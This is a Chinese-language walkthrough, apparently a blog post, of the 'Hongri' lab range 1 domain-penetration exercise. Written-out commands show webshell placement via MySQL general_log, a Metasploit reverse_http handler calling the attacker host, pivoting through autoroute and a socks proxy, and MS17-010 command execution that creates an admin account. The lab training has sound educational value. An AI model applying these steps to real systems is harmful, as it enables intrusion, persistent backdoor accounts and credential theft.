内网域渗透—红日靶场1

文章目录

      • 0x01、实验环境
      • 0x02、web服务器getshell
      • 0x03、提权上线
      • 0x04、内网渗透

0x01、实验环境

红日一靶场

网络拓扑图

内网域渗透—红日靶场1_第1张图片

实验环境

win7:web服务器
	公网IP:192.168.1.139
	内网IP:192.168.52.143
Win2008:域控
	内网IP:192.168.52.
Win2003:域成员
	内网IP:192.168.52.

0x02、web服务器getshell

扫描端口

内网域渗透—红日靶场1_第2张图片

发现web服务,访问服务器

内网域渗透—红日靶场1_第3张图片

在探针中可以尝试数据库检测,发现默认账号密码root没有改变

内网域渗透—红日靶场1_第4张图片

尝试进入phpmyadmin

内网域渗透—红日靶场1_第5张图片

使用测出的mysql账号密码登录

内网域渗透—红日靶场1_第6张图片

尝试在SQL中直接写入webshell

select '' into outfile 'C:/phpstudy/WWW/hack.php'

内网域渗透—红日靶场1_第7张图片

失败

发现没有权限写入

内网域渗透—红日靶场1_第8张图片

尝试通过全局日志写入webshell

内网域渗透—红日靶场1_第9张图片

开启general_log模式set global general_log = on;

修改存放路径,设置日志目录为shell地址set global general_log_file = 'C:/phpstudy/WWW/hack.php';

内网域渗透—红日靶场1_第10张图片

再次查询,写入一句话

select ''

可以在服务器中看到,文件中已经有写入的一句话木马了

内网域渗透—红日靶场1_第11张图片

拿shell

内网域渗透—红日靶场1_第12张图片

发现有yxcms,尝试访问

内网域渗透—红日靶场1_第13张图片

主页直接写有后台地址和账号密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PesIbBXy-1650358875735)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220418003430555.png)]

进入同样可以拿shell(通过模板)

0x03、提权上线

默认权限很高

image-20220418003948185

杀软检测

内网域渗透—红日靶场1_第14张图片

CS写马上线

内网域渗透—红日靶场1_第15张图片

内网域渗透—红日靶场1_第16张图片

sleep 0

内网域渗透—红日靶场1_第17张图片

简单信息收集

查看补丁

内网域渗透—红日靶场1_第18张图片

查看内网

内网域渗透—红日靶场1_第19张图片

抓密码

内网域渗透—红日靶场1_第20张图片

联动msf

新建监听器,payload选择foreign HTTP,地址填kali地址,端口自行设置

内网域渗透—红日靶场1_第21张图片

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.137
set lport 4444 
exploit

内网域渗透—红日靶场1_第22张图片

对已上线的靶机新建会话,选择msf的监听器

msf成功上线

内网域渗透—红日靶场1_第23张图片

image-20220418011418083

可直接使用msf内置模块提权为system

内网域渗透—红日靶场1_第24张图片

0x04、内网渗透

arp -a,查询系统中缓存的ARP表

内网域渗透—红日靶场1_第25张图片

添加路由

run autoroute -s 192.168.52.0/24
run autoroute -p

内网域渗透—红日靶场1_第26张图片

探测存活主机

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

内网域渗透—红日靶场1_第27张图片

设置代理

use auxiliary/server/socks_proxy
set SRVHOST 192.168.1.137(攻击机IP)
set VERSION 4a
show options
exploit

修改配置文件vim /etc/proxychains4.conf

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ekVDR1HD-1650358875742)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220418012934186.png)]

对其他目标信息收集

此后操作记得带上proxychains

proxychains nmap -sT -Pn -T4 192.168.52.141

内网域渗透—红日靶场1_第28张图片

nmap端口扫描很慢可以使用cs插件获取

内网域渗透—红日靶场1_第29张图片

利用nmap脚本查看可以利用漏洞

proxychains nmap --script=vuln 192.168.52.141

使用ms17-010的另一种模块

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set COMMAND net user hack Hack.com /add
exploit
set COMMAND net localgroup administrators hack /add
exploit
set COMMAND net localgroup administrators
exploit

命令成功执行,在141上成功新建用户并加入管理员组

其他内网姿势还在学习中

你可能感兴趣的:(内网,渗透测试,渗透测试,web安全,内网)